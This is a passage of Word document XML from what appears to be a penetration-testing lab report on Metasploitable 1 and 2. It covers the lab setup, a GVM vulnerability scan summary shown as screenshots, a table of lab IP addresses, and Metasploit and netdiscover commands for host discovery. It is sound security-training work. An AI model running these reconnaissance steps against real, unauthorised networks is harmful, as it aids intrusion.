      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="52579364" w14:textId="6B16B292" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali 2023.4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E84E76" w14:textId="0EC24E06" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF0A86" w14:textId="206CF366" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploitable 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130E359" w14:textId="6F154C47" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WMware workstation pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FB3663" w14:textId="2AFA8A96" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00050E8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Windows Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFCF1F1" w14:textId="77777777" w:rsidR="00460C48" w:rsidRPr="00460C48" w:rsidRDefault="00460C48" w:rsidP="00050E8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc155092353"/>
      <w:r w:rsidRPr="00460C48">
        <w:t>Web references</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00460C48">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDA9014" w14:textId="1192DBDF" w:rsidR="00460C48" w:rsidRPr="00460C48" w:rsidRDefault="00E20F61" w:rsidP="00460C48">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploitable: 1 - walkthrough | Infosec (infosecins tute.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
        <w:t xml:space="preserve"> Note due to age the website contained a number of deadlinks   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D62DE6" w14:textId="5F70AECD" w:rsidR="00460C48" w:rsidRDefault="00E20F61" w:rsidP="00460C48">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploitable: 2 - walkthrough | Infosec (infosecins tute.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
        <w:t xml:space="preserve"> Note due to age the website contained a number of deadlinks   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F9A68" w14:textId="0E610454" w:rsidR="005A7850" w:rsidRDefault="00E20F61" w:rsidP="00460C48">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="005A7850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Debian OpenSSL Predictable PRNG Toys (hdm.io)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="333DBA71" w14:textId="6885E45C" w:rsidR="00115C0E" w:rsidRDefault="00115C0E" w:rsidP="002F504E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc155092354"/>
      <w:r>
        <w:t>Reports mus</w:t>
      </w:r>
      <w:r w:rsidR="002F504E">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0057637D">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="002F504E">
        <w:t>read.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="621A4D26" w14:textId="02B8A0EB" w:rsidR="00B9433B" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:r>
        <w:t>Additional information</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00460C48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploitable2-Linux.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00460C48">
        <w:t xml:space="preserve"> – A GVM scan with </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidRPr="00460C48">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E6FBA">
        <w:t xml:space="preserve">Detailing </w:t>
      </w:r>
      <w:r w:rsidR="00B9433B">
        <w:t>issues detected in the target host. 192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891B9EC" w14:textId="65E51722" w:rsidR="00C26EB7" w:rsidRDefault="00C26EB7" w:rsidP="00460C48">
      <w:r>
        <w:t>This document reports on the results of an automatic security scan. All dates are displayed using the timezone Coordinated Universal Time, which is abbreviated UTC. The task was Metasploitable2-Linux. The scan started at Fri Dec 29 14:43:06 2023 UTC and ended at Fri Dec 29 16:51:16 2023 UTC. The report rst summarises the results found. Then, for each host, the report describes every issue found. Please consider the advice given in each description, in order to rectify the issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9509C7" w14:textId="5A59640E" w:rsidR="002F504E" w:rsidRDefault="003E6FBA" w:rsidP="006972C5">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Toc155035944"/>
      <w:bookmarkStart w:id="4" w:name="_Toc155036700"/>
      <w:bookmarkStart w:id="5" w:name="_Toc155076320"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="005B1C9C">
        <w:object w:dxaOrig="1538" w:dyaOrig="995" w14:anchorId="2FBD9F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65pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.DC" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1765712801" r:id="rId10"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D24E1" w14:textId="65C5ADF8" w:rsidR="007F500D" w:rsidRDefault="007F500D" w:rsidP="00706A19">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc155092355"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>GVM Summary of issues</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="580E6837" w14:textId="4265CA8D" w:rsidR="00706A19" w:rsidRDefault="00F35E63" w:rsidP="00A26A54">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc155092356"/>
      <w:r>
        <w:t>Ports</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="006098DC" w14:textId="5B86B5E1" w:rsidR="00F35E63" w:rsidRDefault="00A617C5" w:rsidP="00706A19">
      <w:r w:rsidRPr="00A617C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59FC52E0" wp14:editId="3390A301">
            <wp:extent cx="5731510" cy="2025015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1244439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9526" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2025015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E70F2" w14:textId="3A7B7366" w:rsidR="00A26A54" w:rsidRDefault="00A26A54" w:rsidP="00A26A54">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc155092357"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="22FC8AFC" w14:textId="63FE0503" w:rsidR="00754B34" w:rsidRDefault="00233507" w:rsidP="00706A19">
      <w:r w:rsidRPr="00233507">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23131DA2" wp14:editId="5E372286">
            <wp:extent cx="5731510" cy="2068830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="135102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2160" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2068830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBDB52" w14:textId="14338863" w:rsidR="002C1C1C" w:rsidRDefault="002C1C1C" w:rsidP="002C1C1C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc155092358"/>
      <w:r>
        <w:t>Operating sytem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1A8F261F" w14:textId="407B2124" w:rsidR="003E2586" w:rsidRDefault="002C1C1C" w:rsidP="00706A19">
      <w:r w:rsidRPr="002C1C1C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02898EE5" wp14:editId="2B0098ED">
            <wp:extent cx="5731510" cy="243205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="76611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1403" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="243205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB8595" w14:textId="77BBE706" w:rsidR="003E2586" w:rsidRPr="003E2586" w:rsidRDefault="003E2586" w:rsidP="003E2586">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc155092359"/>
      <w:r w:rsidRPr="003E2586">
        <w:t>CVE’s detected</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="11251355" w14:textId="05C9C758" w:rsidR="002C1C1C" w:rsidRDefault="003E2586" w:rsidP="00706A19">
      <w:r w:rsidRPr="003E2586">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F13C02" wp14:editId="20030D6A">
            <wp:extent cx="5731510" cy="1518920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="174778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3309" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1518920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14652E18" w14:textId="503B1DB5" w:rsidR="003E2586" w:rsidRDefault="00B2433C" w:rsidP="00706A19">
      <w:r w:rsidRPr="00B2433C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06EF8F1C" wp14:editId="5955937D">
            <wp:extent cx="5731510" cy="2325370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1720769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9392" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2325370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="441683C5" w14:textId="77777777" w:rsidR="00A219A9" w:rsidRDefault="00A219A9" w:rsidP="00706A19"/>
    <w:p w14:paraId="765ADA40" w14:textId="0C4BF9C7" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00050E8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc155092360"/>
      <w:r>
        <w:t>Running netdiscover</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6DEF6485" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRPr="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00050E8D"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid0"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3006"/>
      </w:tblGrid>
      <w:tr w:rsidR="00050E8D" w14:paraId="5565C335" w14:textId="77777777" w:rsidTr="00C03BAF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19DB1BF5" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>Network Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05CC4B77" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0977D652" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00050E8D" w14:paraId="289FF70B" w14:textId="77777777" w:rsidTr="00C03BAF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BFEA3AB" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D9A1AD" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRPr="00460C48" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00460C48">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.254.1-  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="621C396B" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r w:rsidRPr="00460C48">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.254.254   </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FD3BA53" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00050E8D" w14:paraId="43E9CF46" w14:textId="77777777" w:rsidTr="00C03BAF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD52243" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>VM Host physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A901FD5" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>192.168.254.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="662210C2" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00050E8D" w14:paraId="74863BEC" w14:textId="77777777" w:rsidTr="00C03BAF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BC18060" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4966DBCF" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>192.168.254.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A0B74A3" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00050E8D" w14:paraId="34F995EC" w14:textId="77777777" w:rsidTr="00C03BAF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CB5BB1A" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>DHCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D7C3B7" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>192.168.254.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7C1334" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00050E8D" w14:paraId="299A098D" w14:textId="77777777" w:rsidTr="00C03BAF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65F94504" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>Metasploitable 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D992D5" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>192.168.254.187</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03E2A9D5" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>Used for ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00050E8D" w14:paraId="773E8188" w14:textId="77777777" w:rsidTr="00C03BAF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="156D3068" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>Metasploitable 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E6B284" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>192.168.254.186</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="655B3649" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00C03BAF">
            <w:r>
              <w:t>Main Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D22C48C" w14:textId="77777777" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00050E8D"/>
    <w:p w14:paraId="1C23CC9A" w14:textId="77777777" w:rsidR="003B5EC8" w:rsidRDefault="003B5EC8" w:rsidP="003B5EC8">
      <w:r>
        <w:t xml:space="preserve">This section details the network the virtual network the lab is running netdiscover and explana on of the virtual network First, we launch  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C86604A" w14:textId="246CE2AC" w:rsidR="003B5EC8" w:rsidRPr="00050E8D" w:rsidRDefault="003B5EC8" w:rsidP="003B5EC8">
      <w:r>
        <w:t xml:space="preserve">Metasploit from the command line from kali sudo msfdb init &amp;&amp; msfconsole   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D73CFF" w14:textId="0E730385" w:rsidR="00050E8D" w:rsidRDefault="00A55419" w:rsidP="00460C48">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B6A0D55" wp14:editId="6E24A24B">
            <wp:extent cx="5736590" cy="6303645"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="88013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6590" cy="6303645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41829CCD" w14:textId="5114CC1B" w:rsidR="00A55419" w:rsidRDefault="0053065B" w:rsidP="00460C48">
      <w:r w:rsidRPr="0053065B">
        <w:t>From the msf6 command prompt run sudo netdiscover -r 192.168.254.1/</w:t>
      </w:r>
      <w:r w:rsidR="0014407D">
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="0053065B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C129D">
        <w:t xml:space="preserve">setting </w:t>
      </w:r>
      <w:r w:rsidRPr="0053065B">
        <w:t xml:space="preserve">the range otherwise netdiscover will go through a cycle on many networks which is not necessary. Here it is just running through 192.168.*.*  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A08317A" w14:textId="52F752ED" w:rsidR="00253760" w:rsidRDefault="00253760" w:rsidP="00460C48">
      <w:r w:rsidRPr="00253760">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">While I have shown physical addresses I have redacted the physical host address, the others are virtual.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16497155" w14:textId="471077B1" w:rsidR="00253760" w:rsidRDefault="008E51FC" w:rsidP="008E51FC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DCC8A34" wp14:editId="513BED3D">
            <wp:extent cx="4416357" cy="1276269"/>
            <wp:effectExtent l="0" t="0" r="3810" b="635"/>
            <wp:docPr id="277" name="Picture 27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77" name="Picture 277" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4418832" cy="1276984"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7370EA" w14:textId="77777777" w:rsidR="004417A4" w:rsidRDefault="004417A4" w:rsidP="004417A4">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
